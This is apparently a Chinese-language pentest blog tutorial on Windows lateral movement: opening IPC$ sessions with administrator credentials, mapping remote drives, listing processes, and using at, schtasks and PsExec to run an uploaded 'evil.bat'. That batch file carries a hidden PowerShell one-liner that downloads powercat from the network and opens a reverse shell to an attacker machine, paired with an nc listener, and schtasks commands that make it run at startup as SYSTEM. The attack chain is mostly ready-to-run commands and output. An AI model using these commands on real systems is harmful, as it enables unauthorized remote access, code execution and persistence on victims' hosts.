0、前言

在多層代理的環(huán)境中，由于網(wǎng)絡(luò)限制，通常采用命令行的方式連接主機(jī)，這里學(xué)習(xí)下 IPC 建立會(huì)話與配置計(jì)劃任務(wù)的相關(guān)點(diǎn)。

1、IPC

IPC (Internet Process Connection) 是為了實(shí)現(xiàn)進(jìn)程間通信而開放的命名管道，當(dāng)目標(biāo)開啟了 IPC$ 文件共享并得到用戶賬號(hào)密碼后，就可以使用 IPC 建立連接，獲取權(quán)限。

建立 IPC 連接：

net use \\192.168.7.107\ipc$ "1qaz@WSX" /user:administrator

輸入 net use 可以查看當(dāng)前建立的連接

C:\>net use \\192.168.7.107\ipc$ "1qaz@WSX" /user:administrator
命令成功完成。

C:\>net use
會(huì)記錄新的網(wǎng)絡(luò)連接。

狀態(tài)       本地        遠(yuǎn)程                      網(wǎng)絡(luò)
-------------------------------------------------------------------------------
OK                     \\192.168.7.107\ipc$      Microsoft Windows Network
命令成功完成。

映射磁盤到本地

net use t: \\192.168.7.107\c$

如果想刪除映射的磁盤

net use t: /del

dir 列出對(duì)方目錄

dir \\192.168.7.107\c$

C:\>dir \\192.168.7.107\c$
 驅(qū)動(dòng)器 \\192.168.7.107\c$ 中的卷沒(méi)有標(biāo)簽。
 卷的序列號(hào)是 BC2F-8F01

 \\192.168.7.107\c$ 的目錄

2020/11/24  17:28    <DIR>          Program Files
2020/11/24  17:26    <DIR>          Program Files (x86)
2021/02/13  17:49    <DIR>          TEMP
2021/08/02  11:42    <DIR>          Users
2020/11/25  08:37    <DIR>          Windows
               0 個(gè)文件              0 字節(jié)
              5 個(gè)目錄 32,833,009,664 可用字節(jié)

tasklist 查看進(jìn)程

tasklist /S 192.168.7.107 /U administrator /P 1qaz@WSX

C:\>tasklist /S 192.168.7.107 /U administrator /P 1qaz@WSX

映像名稱                       PID 會(huì)話名              會(huì)話#       內(nèi)存使用
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        368 K
smss.exe                       260                            0        628 K
csrss.exe                      356                            0      2,360 K
wininit.exe                    408                            0        264 K
csrss.exe                      420                            1      8,692 K
winlogon.exe                   468                            1      2,012 K
services.exe                   512                            0      7,460 K
lsass.exe                      520                            0     10,216 K
lsm.exe                        528                            0      4,148 K
spoolsv.exe                   1356                            0      6,504 K
svchost.exe                   1392                            0      7,028 K

使用 \del 可斷開連接

net use \\192.168.7.107\ipc$ /del

2、計(jì)劃任務(wù)

Windows 可用于創(chuàng)建計(jì)劃任務(wù)的命令有兩個(gè)，分別是 at 和 schtasks，at 在 Windows Server 2008 及之后的系統(tǒng)中，已經(jīng)被廢棄了。

這里看看在建立 IPC 連接后，使用計(jì)劃任務(wù)運(yùn)行可執(zhí)行文件，主要步驟如下：

1、查看目標(biāo)主機(jī)時(shí)間

2、上傳可執(zhí)行文件到目標(biāo)主機(jī)

3、設(shè)置計(jì)劃任務(wù)執(zhí)行可執(zhí)行文件

4、刪除計(jì)劃任務(wù)

首先查看下目標(biāo)主機(jī)時(shí)間

net time \\192.168.7.107

C:\>net time \\192.168.7.107
\\192.168.7.107 的當(dāng)前時(shí)間是 2021/8/2 14:28:01
命令成功完成。

創(chuàng)建一個(gè)反彈木馬 bat 程序，這里使用 PowerShell 進(jìn)行反彈，bat 文件內(nèi)容如下：

powershell.exe -nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://ghproxy.com/raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.7.4 -p 4444 -e cmd"

在攻擊機(jī)上開啟 nc 監(jiān)聽

nc -lvp 4444

將 bat 程序上傳到目標(biāo)主機(jī)

copy evil.bat \\192.168.7.107\c$

使用 at 創(chuàng)建計(jì)劃任務(wù)

at \\192.168.7.107 14:30 C:\evil.bat

如果想清除 ID 為 1 的計(jì)劃任務(wù)

at \\192.168.7.107 1 /del

使用 schtasks 創(chuàng)建計(jì)劃任務(wù)

# 開機(jī)以 system 權(quán)限執(zhí)行 C:\evil.bat
schtasks /create /s 192.168.7.107 /tn evil /sc onstart /tr C:\evil.bat /ru system /f

# 在 2021/08/03 前的每一天的 14:30:00 執(zhí)行 C:\evil.bat
schtasks /create /s 192.168.7.107 /tn evil /tr C:\evil.bat /sc daily /st 14:30:00 /ed 2021/08/03

# 立刻運(yùn)行名稱為 evil 的任務(wù)
schtasks /run /s 192.168.7.107 /i /tn "evil"

如果想清除名稱為 evil 的計(jì)劃任務(wù)

schtasks /delete /s 192.168.7.107 /tn "evil" /f

在建立 IPC 連接后，除了使用計(jì)劃任務(wù)進(jìn)行間接的反彈 Shell，還可以通過(guò) PsExec 直接反彈 Shell

PsExec 下載地址：https://download.sysinternals.com/files/PSTools.zip

Psexec.exe -accepteula \\192.168.7.107 -s cmd.exe

image

參考文章：
https://www.freebuf.com/articles/web/251389.html

原文鏈接：
https://teamssix.com/year/210802-181052.html